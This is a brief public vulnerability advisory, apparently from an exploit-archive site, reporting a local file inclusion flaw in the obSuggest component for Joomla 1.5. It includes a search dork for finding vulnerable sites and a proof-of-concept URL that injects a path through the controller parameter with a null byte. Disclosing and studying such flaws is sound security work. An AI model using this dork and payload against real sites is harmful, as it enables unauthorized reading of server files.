Joomla obSuggest Local File Inclusion

Published
Credit
Risk
2011.08.01
v3n0m
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

Joomla Component obSuggest Local File Inclusion Vulnerability

Author : v3n0m
Discovered : July, 31-2011 GMT +7:00 Jakarta, Indonesia
Software : obSuggest - Uservoice for Joomla
Developer : http://foobla.com/
License : GPLv2 or later
Tested On : Joomla 1.5.x
Dorks : inurl:com_obsuggest
-----------------------------------------------------------------------

Proof of Concept:
----------------
http://127.0.0.1/[path]/index.php?option=com_obsuggest&controller=[LFI]%00

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id

References:

http://www.yogyacarderlink.web.id/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com